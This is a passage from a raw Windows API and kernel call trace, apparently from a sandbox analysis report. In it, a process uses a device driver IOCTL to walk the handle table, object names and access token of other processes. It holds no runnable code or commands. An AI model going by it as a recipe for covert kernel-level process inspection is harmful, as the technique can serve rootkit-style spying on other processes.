HandleInformation=0x0) returned 0x0 [0264.879] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.879] PsReleaseProcessExitSynchronization () returned 0x2 [0264.879] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40020 [0264.879] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.880] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18fffb [0264.880] IoCompleteRequest () returned 0x0 [0264.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2d8) returned 0x180 [0264.880] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0264.880] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006980e200, HandleInformation=0x0) returned 0x0 [0264.880] ObOpenObjectByPointer (in: Object=0xffffe0006980e200, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.880] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x400be [0264.880] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a287b00 | out: TokenHandle=0xffffe0006a287b00*=0x1a8) returned 0x0 [0264.880] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.880] IoCompleteRequest () returned 0x0 [0264.880] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.880] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5a, [1]=0x0, [2]=0x0)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="DWM-1", cchName=0x14d3c0, ReferencedDomainName="Window Manager", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.881] CloseHandle (hObject=0x1a8) returned 1 [0264.881] CloseHandle (hObject=0x180) returned 1 [0264.881] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.881] PsAcquireProcessExitSynchronization () returned 0x0 [0264.881] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.881] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698204e0, HandleInformation=0x0) returned 0x0 [0264.881] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.881] PsReleaseProcessExitSynchronization () returned 0x2 [0264.881] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380bc [0264.881] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.881] ObfDereferenceObject (Object=0xffffe000698204e0) returned 0x7fff [0264.881] IoCompleteRequest () returned 0x0 [0264.881] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.881] PsAcquireProcessExitSynchronization () returned 0x0 [0264.881] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.881] ObReferenceObjectByHandle (in: Handle=0x90, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069701d10, HandleInformation=0x0) returned 0x0 [0264.881] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.881] PsReleaseProcessExitSynchronization () returned 0x2 [0264.881] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380bb [0264.881] ObQueryNameString (in: Object=0xffffe00069701d10, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.881] ObfDereferenceObject (Object=0xffffe00069701d10) returned 0x800f [0264.881] IoCompleteRequest () returned 0x0 [0264.881] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.881] PsAcquireProcessExitSynchronization () returned 0x0 [0264.882] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.882] ObReferenceObjectByHandle (in: Handle=0x160, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0264.882] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.882] PsReleaseProcessExitSynchronization () returned 0x2 [0264.882] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380ba [0264.882] IoCompleteRequest () returned 0x0 [0264.882] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.882] PsAcquireProcessExitSynchronization () returned 0x0 [0264.882] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.882] ObReferenceObjectByHandle (in: Handle=0x2a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698393d0, HandleInformation=0x0) returned 0x0 [0264.882] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.882] PsReleaseProcessExitSynchronization () returned 0x2 [0264.882] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380b9 [0264.882] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.882] ObfDereferenceObject (Object=0xffffe000698393d0) returned 0x7fff [0264.882] IoCompleteRequest () returned 0x0 [0264.882] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.882] PsAcquireProcessExitSynchronization () returned 0x0 [0264.882] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.882] ObReferenceObjectByHandle (in: Handle=0x2b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148565d70, HandleInformation=0x0) returned 0x0 [0264.882] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.882] PsReleaseProcessExitSynchronization () returned 0x2 [0264.882] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380b8 [0264.882] ObQueryNameString (in: Object=0xffffc00148565d70, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.882] ObfDereferenceObject (Object=0xffffc00148565d70) returned 0xf8000 [0264.882] IoCompleteRequest () returned 0x0 [0264.882] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.882] PsAcquireProcessExitSynchronization () returned 0x0 [0264.882] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.882] ObReferenceObjectByHandle (in: Handle=0x2b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014935e980, HandleInformation=0x0) returned 0x0 [0264.882] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.882] PsReleaseProcessExitSynchronization () returned 0x2 [0264.882] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380b7 [0264.882] ObQueryNameString (in: Object=0xffffc0014935e980, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.882] ObfDereferenceObject (Object=0xffffc0014935e980) returned 0x10002 [0264.882] IoCompleteRequest () returned 0x0 [0264.882] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.882] PsAcquireProcessExitSynchronization () returned 0x0 [0264.882] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.882] ObReferenceObjectByHandle (in: Handle=0x2d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069835b90, HandleInformation=0x0) returned 0x0 [0264.882] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.882] PsReleaseProcessExitSynchronization () returned 0x2 [0264.882] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380b6 [0264.882] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.883] ObfDereferenceObject (Object=0xffffe00069835b90) returned 0x7fff [0264.883] IoCompleteRequest () returned 0x0 [0264.883] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.883] PsAcquireProcessExitSynchronization () returned 0x0 [0264.883] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.883] ObReferenceObjectByHandle (in: Handle=0x2d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.883] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.883] PsReleaseProcessExitSynchronization () returned 0x2 [0264.883] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380b5 [0264.883] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.883] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18fffa [0264.883] IoCompleteRequest () returned 0x0 [0264.883] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.883] PsAcquireProcessExitSynchronization () returned 0x0 [0264.883] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.883] ObReferenceObjectByHandle (in: Handle=0x2e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.883] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.883] PsReleaseProcessExitSynchronization () returned 0x2 [0264.883] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380b4 [0264.883] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.883] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18fff9 [0264.883] IoCompleteRequest () returned 0x0 [0264.883] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.883] PsAcquireProcessExitSynchronization () returned 0x0 [0264.883] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.883] ObReferenceObjectByHandle (in: Handle=0x324, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014805ffc0, HandleInformation=0x0) returned 0x0 [0264.883] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.883] PsReleaseProcessExitSynchronization () returned 0x2 [0264.883] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380b3 [0264.883] ObQueryNameString (in: Object=0xffffc0014805ffc0, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.883] ObfDereferenceObject (Object=0xffffc0014805ffc0) returned 0x8000 [0264.883] IoCompleteRequest () returned 0x0 [0264.883] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.883] PsAcquireProcessExitSynchronization () returned 0x0 [0264.883] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.883] ObReferenceObjectByHandle (in: Handle=0x3a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069a14f20, HandleInformation=0x0) returned 0x0 [0264.883] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.883] PsReleaseProcessExitSynchronization () returned 0x2 [0264.883] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380b2 [0264.883] ObQueryNameString (in: Object=0xffffe00069a14f20, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.883] ObfDereferenceObject (Object=0xffffe00069a14f20) returned 0x800b [0264.883] IoCompleteRequest () returned 0x0 [0264.883] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.884] PsAcquireProcessExitSynchronization () returned 0x0 [0264.884] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.884] ObReferenceObjectByHandle (in: Handle=0x3ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001485ad890, HandleInformation=0x0) returned 0x0 [0264.884] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.884] PsReleaseProcessExitSynchronization () returned 0x2 [0264.884] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380b1 [0264.884] ObQueryNameString (in: Object=0xffffc001485ad890, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.884] ObfDereferenceObject (Object=0xffffc001485ad890) returned 0x8000 [0264.884] IoCompleteRequest () returned 0x0 [0264.884] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.884] PsAcquireProcessExitSynchronization () returned 0x0 [0264.884] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.884] ObReferenceObjectByHandle (in: Handle=0x3dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014938d4c0, HandleInformation=0x0) returned 0x0 [0264.884] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.884] PsReleaseProcessExitSynchronization () returned 0x2 [0264.884] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380b0 [0264.884] ObQueryNameString (in: Object=0xffffc0014938d4c0, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.884] ObfDereferenceObject (Object=0xffffc0014938d4c0) returned 0x10002 [0264.884] IoCompleteRequest () returned 0x0 [0264.884] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.884] PsAcquireProcessExitSynchronization () returned 0x0 [0264.884] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.884] ObReferenceObjectByHandle (in: Handle=0x3e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148555690, HandleInformation=0x0) returned 0x0 [0264.884] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.884] PsReleaseProcessExitSynchronization () returned 0x2 [0264.884] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380af [0264.884] ObQueryNameString (in: Object=0xffffc00148555690, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.884] ObfDereferenceObject (Object=0xffffc00148555690) returned 0xf7ffe [0264.884] IoCompleteRequest () returned 0x0 [0264.884] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.884] PsAcquireProcessExitSynchronization () returned 0x0 [0264.884] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.884] ObReferenceObjectByHandle (in: Handle=0x3f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a348620, HandleInformation=0x0) returned 0x0 [0264.884] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.884] PsReleaseProcessExitSynchronization () returned 0x2 [0264.884] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380ae [0264.884] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.884] ObfDereferenceObject (Object=0xffffe0006a348620) returned 0x7ffd [0264.884] IoCompleteRequest () returned 0x0 [0264.884] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.884] PsAcquireProcessExitSynchronization () returned 0x0 [0264.884] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.884] ObReferenceObjectByHandle (in: Handle=0x404, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148cc6de0, HandleInformation=0x0) returned 0x0 [0264.885] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.885] PsReleaseProcessExitSynchronization () returned 0x2 [0264.885] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380ad [0264.885] ObQueryNameString (in: Object=0xffffc00148cc6de0, ObjectNameInfo=0xffffe0006a3b07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.885] ObfDereferenceObject (Object=0xffffc00148cc6de0) returned 0x10002 [0264.885] IoCompleteRequest () returned 0x0 [0264.885] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.885] PsAcquireProcessExitSynchronization () returned 0x0 [0264.885] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.885] ObReferenceObjectByHandle (in: Handle=0x410, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149c56300, HandleInformation=0x0) returned 0x0 [0264.885] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.885] PsReleaseProcessExitSynchronization () returned 0x2 [0264.885] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380ac [0264.885] ObQueryNameString (in: Object=0xffffc00149c56300, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.885] ObfDereferenceObject (Object=0xffffc00149c56300) returned 0x10002 [0264.885] IoCompleteRequest () returned 0x0 [0264.885] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.885] PsAcquireProcessExitSynchronization () returned 0x0 [0264.885] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.885] ObReferenceObjectByHandle (in: Handle=0x41c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149818940, HandleInformation=0x0) returned 0x0 [0264.885] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.885] PsReleaseProcessExitSynchronization () returned 0x2 [0264.885] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380ab [0264.885] ObQueryNameString (in: Object=0xffffc00149818940, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.885] ObfDereferenceObject (Object=0xffffc00149818940) returned 0x7fff [0264.885] IoCompleteRequest () returned 0x0 [0264.885] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.885] PsAcquireProcessExitSynchronization () returned 0x0 [0264.885] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.885] ObReferenceObjectByHandle (in: Handle=0x444, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149725060, HandleInformation=0x0) returned 0x0 [0264.885] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.885] PsReleaseProcessExitSynchronization () returned 0x2 [0264.885] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380aa [0264.885] ObQueryNameString (in: Object=0xffffc00149725060, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.885] ObfDereferenceObject (Object=0xffffc00149725060) returned 0x10002 [0264.885] IoCompleteRequest () returned 0x0 [0264.885] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.885] PsAcquireProcessExitSynchronization () returned 0x0 [0264.885] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.885] ObReferenceObjectByHandle (in: Handle=0x448, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014855d3a0, HandleInformation=0x0) returned 0x0 [0264.885] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.885] PsReleaseProcessExitSynchronization () returned 0x2 [0264.885] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380a9 [0264.885] ObQueryNameString (in: Object=0xffffc0014855d3a0, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.886] ObfDereferenceObject (Object=0xffffc0014855d3a0) returned 0x7ffd [0264.886] IoCompleteRequest () returned 0x0 [0264.886] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.886] PsAcquireProcessExitSynchronization () returned 0x0 [0264.886] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000b1b8e400) [0264.886] ObReferenceObjectByHandle (in: Handle=0x464, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149bea2f0, HandleInformation=0x0) returned 0x0 [0264.886] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.886] PsReleaseProcessExitSynchronization () returned 0x2 [0264.886] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380a8 [0264.886] ObQueryNameString (in: Object=0xffffc00149bea2f0, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.886] ObfDereferenceObject (Object=0xffffc00149bea2f0) returned 0x10002 [0264.886] IoCompleteRequest () returned 0x0 [0264.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x318) returned 0x180 [0264.886] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, 